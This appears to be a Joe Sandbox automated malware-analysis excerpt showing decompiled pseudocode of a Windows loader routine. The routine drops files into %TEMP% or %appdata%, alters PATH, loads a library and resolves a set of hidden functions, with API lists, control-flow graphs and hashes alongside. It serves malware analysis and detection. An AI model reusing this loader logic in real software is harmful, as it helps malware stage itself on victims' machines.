				 *((intOrPtr*)( *_t103))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				SetCurrentDirectoryW(E00403D3C( *0x41c7c0)); // executed
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t279);
				_t117 = LoadLibraryExW(E00403D3C(_v56), 0, 8); // executed
				 *0x41c7bc = _t117;
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t244);
				 *[fs:eax] = _t244;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}










































                                                                                                    0x0040831c
                                                                                                    0x0040831e
                                                                                                    0x00408320
                                                                                                    0x00408322
                                                                                                    0x00408324
                                                                                                    0x00408325
                                                                                                    0x00408327
                                                                                                    0x00408329
                                                                                                    0x0040832b
                                                                                                    0x00408330
                                                                                                    0x00408330
                                                                                                    0x00408332
                                                                                                    0x00408334
                                                                                                    0x00408334
                                                                                                    0x00408334
                                                                                                    0x00408337
                                                                                                    0x00408338
                                                                                                    0x00408339
                                                                                                    0x0040833b
                                                                                                    0x00408341
                                                                                                    0x00408352
                                                                                                    0x00408353
                                                                                                    0x00408358
                                                                                                    0x0040835b
                                                                                                    0x0040835e
                                                                                                    0x00408368
                                                                                                    0x00408373
                                                                                                    0x0040837e
                                                                                                    0x00408389
                                                                                                    0x0040838e
                                                                                                    0x00408393
                                                                                                    0x00408396
                                                                                                    0x004083a3
                                                                                                    0x004083ae
                                                                                                    0x004083b8
                                                                                                    0x004083c7
                                                                                                    0x004083d1
                                                                                                    0x004083de
                                                                                                    0x004083eb
                                                                                                    0x004083f3
                                                                                                    0x004083f8
                                                                                                    0x004083fa
                                                                                                    0x004083fc
                                                                                                    0x00408401
                                                                                                    0x00408404
                                                                                                    0x00408411
                                                                                                    0x0040841c
                                                                                                    0x00408426
                                                                                                    0x00408435
                                                                                                    0x0040843f
                                                                                                    0x0040843f
                                                                                                    0x0040844d
                                                                                                    0x00408456
                                                                                                    0x00408458
                                                                                                    0x0040845a
                                                                                                    0x00408461
                                                                                                    0x00408475
                                                                                                    0x0040847c
                                                                                                    0x0040847c
                                                                                                    0x00408490
                                                                                                    0x004084a3
                                                                                                    0x004084aa
                                                                                                    0x004084bb
                                                                                                    0x004084c9
                                                                                                    0x004084d6
                                                                                                    0x004084e4
                                                                                                    0x004084e9
                                                                                                    0x004084ee
                                                                                                    0x004084fc
                                                                                                    0x00408512
                                                                                                    0x0040851f
                                                                                                    0x00408535
                                                                                                    0x00408542
                                                                                                    0x00408558
                                                                                                    0x00408565
                                                                                                    0x0040857b
                                                                                                    0x00408588
                                                                                                    0x0040859e
                                                                                                    0x004085ab
                                                                                                    0x004085c1
                                                                                                    0x004085ce
                                                                                                    0x004085e4
                                                                                                    0x004085f1
                                                                                                    0x00408607
                                                                                                    0x00408614
                                                                                                    0x0040862a
                                                                                                    0x00408637
                                                                                                    0x0040864d
                                                                                                    0x0040865a
                                                                                                    0x00408670
                                                                                                    0x0040867d
                                                                                                    0x00408693
                                                                                                    0x004086a0
                                                                                                    0x004086b6
                                                                                                    0x004086c2
                                                                                                    0x00408730
                                                                                                    0x00408730
                                                                                                    0x004086c2
                                                                                                    0x00408739
                                                                                                    0x0040873c
                                                                                                    0x0040873f
                                                                                                    0x0040874c
                                                                                                    0x00408759
                                                                                                    0x00408766
                                                                                                    0x00408773
                                                                                                    0x00408780

                                                                                                    APIs
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                    • SetCurrentDirectoryW.KERNEL32(00000000,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084BB
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?), ref: 0040850D
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 00408530
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000), ref: 00408553
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C), ref: 00408576
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC), ref: 00408599
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008), ref: 004085BC
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004085DF
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408602
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408625
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408648
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040866B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040868E
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004086B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Directory$Create$CurrentLibraryLoad
                                                                                                    • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                    • API String ID: 1998666822-1089150275
                                                                                                    • Opcode ID: a3a7f0e04276fa5588cadaa871e822f5307a06622094e1642ca5e6744384a9c2
                                                                                                    • Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
                                                                                                    • Opcode Fuzzy Hash: a3a7f0e04276fa5588cadaa871e822f5307a06622094e1642ca5e6744384a9c2
                                                                                                    • Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408324 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 319libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 772 408324-40832b 773 408330-408335 772->773 773->773 774 408337-4083fa call 403980 call 406c4c call 406258 * 2 call 403d2c call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 call 40813c call 403db8 call 4076b0 773->774 801 408444-40845a 774->801 802 4083fc-40843f call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 774->802 806 40845c-40847a call 4040b0 call 403d3c 801->806 807 40847e-4084ee call 403e1c call 403d3c * 2 SetCurrentDirectoryW call 40813c call 403db8 call 403d3c LoadLibraryExW 801->807 802->801 806->807 832 4084f4-4086c2 call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress 807->832 833 408737-408780 call 403508 call 403b98 call 403508 call 403b98 call 4034e4 807->833 832->833 897 4086c4-4086cb 832->897 897->833 898 4086cd-4086d4 897->898 898->833 899 4086d6-4086dd 898->899 899->833 900 4086df-4086e6 899->900 900->833 901 4086e8-4086ef 900->901 901->833 902 4086f1-4086f8 901->902 902->833 903 4086fa-408701 902->903 903->833 904 408703-40870a 903->904 904->833 905 40870c-408713 904->905 905->833 906 408715-40871c 905->906 906->833 907 40871e-408725 906->907 907->833 908 408727-40872e 907->908 908->833 909 408730 908->909 909->833
                                                                                                    C-Code - Quality: 73%
                                                                                                    			E00408324(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t102;
				struct HINSTANCE__* _t116;
				intOrPtr* _t210;
				void* _t225;
				intOrPtr _t243;
				void* _t269;
				intOrPtr _t271;
				intOrPtr _t272;

				_t268 = __esi;
				asm("das");
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_t271 = _t272;
				_t225 = 0xd;
				do {
					_push(0);
					_push(0);
					_t225 = _t225 - 1;
					_t274 = _t225;
				} while (_t225 != 0);
				_push(_t225);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t271);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t272;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi); // executed
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t274);
				E00406258(_v24, 0x41c7bc,  &_v20, _t268, _t274);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t274);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0); // executed
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t274); // executed
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t274);
				_t95 = E004076B0(_v40, 0x41c7bc, _v44); // executed
				_t275 = _t95;
				if(_t95 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t275);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t275);
				}
				_t96 =  *0x41b578; // 0x41c6b0
				_t269 =  *((intOrPtr*)( *_t96))(L"PATH", 0, 0);
				_t276 = _t269;
				if(_t269 > 0) {
					E004040B0( &_v12, _t269);
					_t210 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t210))(L"PATH", E00403D3C(_v12), _t269);
				}
				E00403E1C();
				_t102 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t102))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				SetCurrentDirectoryW(E00403D3C( *0x41c7c0)); // executed
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t276);
				_t116 = LoadLibraryExW(E00403D3C(_v56), 0, 8); // executed
				 *0x41c7bc = _t116;
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t243);
				 *[fs:eax] = _t243;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}









































                                                                                                    0x00408324
                                                                                                    0x00408324
                                                                                                    0x00408325
                                                                                                    0x00408327
                                                                                                    0x00408329
                                                                                                    0x0040832b
                                                                                                    0x00408330
                                                                                                    0x00408330
                                                                                                    0x00408332
                                                                                                    0x00408334
                                                                                                    0x00408334
                                                                                                    0x00408334
                                                                                                    0x00408337
                                                                                                    0x00408338
                                                                                                    0x00408339
                                                                                                    0x0040833b
                                                                                                    0x00408341
                                                                                                    0x00408352
                                                                                                    0x00408353
                                                                                                    0x00408358
                                                                                                    0x0040835b
                                                                                                    0x0040835e
                                                                                                    0x00408368
                                                                                                    0x00408373
                                                                                                    0x0040837e
                                                                                                    0x00408389
                                                                                                    0x0040838e
                                                                                                    0x00408393
                                                                                                    0x00408396
                                                                                                    0x004083a3
                                                                                                    0x004083ae
                                                                                                    0x004083b8
                                                                                                    0x004083c7
                                                                                                    0x004083d1
                                                                                                    0x004083de
                                                                                                    0x004083eb
                                                                                                    0x004083f3
                                                                                                    0x004083f8
                                                                                                    0x004083fa
                                                                                                    0x004083fc
                                                                                                    0x00408401
                                                                                                    0x00408404
                                                                                                    0x00408411
                                                                                                    0x0040841c
                                                                                                    0x00408426
                                                                                                    0x00408435
                                                                                                    0x0040843f
                                                                                                    0x0040843f
                                                                                                    0x0040844d
                                                                                                    0x00408456
                                                                                                    0x00408458
                                                                                                    0x0040845a
                                                                                                    0x00408461
                                                                                                    0x00408475
                                                                                                    0x0040847c
                                                                                                    0x0040847c
                                                                                                    0x00408490
                                                                                                    0x004084a3
                                                                                                    0x004084aa
                                                                                                    0x004084bb
                                                                                                    0x004084c9
                                                                                                    0x004084d6
                                                                                                    0x004084e4
                                                                                                    0x004084e9
                                                                                                    0x004084ee
                                                                                                    0x004084fc
                                                                                                    0x00408512
                                                                                                    0x0040851f
                                                                                                    0x00408535
                                                                                                    0x00408542
                                                                                                    0x00408558
                                                                                                    0x00408565
                                                                                                    0x0040857b
                                                                                                    0x00408588
                                                                                                    0x0040859e
                                                                                                    0x004085ab
                                                                                                    0x004085c1
                                                                                                    0x004085ce
                                                                                                    0x004085e4
                                                                                                    0x004085f1
                                                                                                    0x00408607
                                                                                                    0x00408614
                                                                                                    0x0040862a
                                                                                                    0x00408637
                                                                                                    0x0040864d
                                                                                                    0x0040865a
                                                                                                    0x00408670
                                                                                                    0x0040867d
                                                                                                    0x00408693
                                                                                                    0x004086a0
                                                                                                    0x004086b6
                                                                                                    0x004086c2
                                                                                                    0x00408730
                                                                                                    0x00408730
                                                                                                    0x004086c2
                                                                                                    0x00408739
                                                                                                    0x0040873c
                                                                                                    0x0040873f
                                                                                                    0x0040874c
                                                                                                    0x00408759
                                                                                                    0x00408766
                                                                                                    0x00408773
                                                                                                    0x00408780

                                                                                                    APIs
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                    • SetCurrentDirectoryW.KERNEL32(00000000,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084BB
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?), ref: 0040850D
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 00408530
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000), ref: 00408553
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C), ref: 00408576
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,?,?,0041B0FC), ref: 00408599
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008), ref: 004085BC
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004085DF
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408602
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408625
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408648
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040866B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040868E
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004086B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Directory$Create$CurrentLibraryLoad
                                                                                                    • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                    • API String ID: 1998666822-1089150275
                                                                                                    • Opcode ID: edc18b18f8305dbdd9bd898c15c8e83ed7fbd3ebddb0e7f499efc5e89588ebce
                                                                                                    • Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
                                                                                                    • Opcode Fuzzy Hash: edc18b18f8305dbdd9bd898c15c8e83ed7fbd3ebddb0e7f499efc5e89588ebce
                                                                                                    • Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408328 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 317libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 910 408328-40832b 911 408330-408335 910->911 911->911 912 408337-4083fa call 403980 call 406c4c call 406258 * 2 call 403d2c call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 call 40813c call 403db8 call 4076b0 911->912 939 408444-40845a 912->939 940 4083fc-40843f call 403e1c call 4062d8 call 403bbc call 403d3c CreateDirectoryW call 4081a0 912->940 944 40845c-40847a call 4040b0 call 403d3c 939->944 945 40847e-4084ee call 403e1c call 403d3c * 2 SetCurrentDirectoryW call 40813c call 403db8 call 403d3c LoadLibraryExW 939->945 940->939 944->945 970 4084f4-4086c2 call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress call 408120 call 403990 GetProcAddress 945->970 971 408737-408780 call 403508 call 403b98 call 403508 call 403b98 call 4034e4 945->971 970->971 1035 4086c4-4086cb 970->1035 1035->971 1036 4086cd-4086d4 1035->1036 1036->971 1037 4086d6-4086dd 1036->1037 1037->971 1038 4086df-4086e6 1037->1038 1038->971 1039 4086e8-4086ef 1038->1039 1039->971 1040 4086f1-4086f8 1039->1040 1040->971 1041 4086fa-408701 1040->1041 1041->971 1042 408703-40870a 1041->1042 1042->971 1043 40870c-408713 1042->1043 1043->971 1044 408715-40871c 1043->1044 1044->971 1045 40871e-408725 1044->1045 1045->971 1046 408727-40872e 1045->1046 1046->971 1047 408730 1046->1047 1047->971
                                                                                                    C-Code - Quality: 74%
                                                                                                    			E00408328(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _t93;
				intOrPtr* _t94;
				intOrPtr* _t100;
				struct HINSTANCE__* _t114;
				intOrPtr* _t208;
				void* _t223;
				intOrPtr _t241;
				void* _t267;
				intOrPtr _t269;
				intOrPtr _t270;

				_t266 = __esi;
				_t269 = _t270;
				_t223 = 0xd;
				do {
					_push(0);
					_push(0);
					_t223 = _t223 - 1;
					_t271 = _t223;
				} while (_t223 != 0);
				_push(_t223);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t269);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t270;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi); // executed
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t271);
				E00406258(_v24, 0x41c7bc,  &_v20, _t266, _t271);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t271);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0); // executed
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t271); // executed
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t271);
				_t93 = E004076B0(_v40, 0x41c7bc, _v44); // executed
				_t272 = _t93;
				if(_t93 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t272);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t272);
				}
				_t94 =  *0x41b578; // 0x41c6b0
				_t267 =  *((intOrPtr*)( *_t94))(L"PATH", 0, 0);
				_t273 = _t267;
				if(_t267 > 0) {
					E004040B0( &_v12, _t267);
					_t208 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t208))(L"PATH", E00403D3C(_v12), _t267);
				}
				E00403E1C();
				_t100 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t100))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				SetCurrentDirectoryW(E00403D3C( *0x41c7c0)); // executed
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t273);
				_t114 = LoadLibraryExW(E00403D3C(_v56), 0, 8); // executed
				 *0x41c7bc = _t114;
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
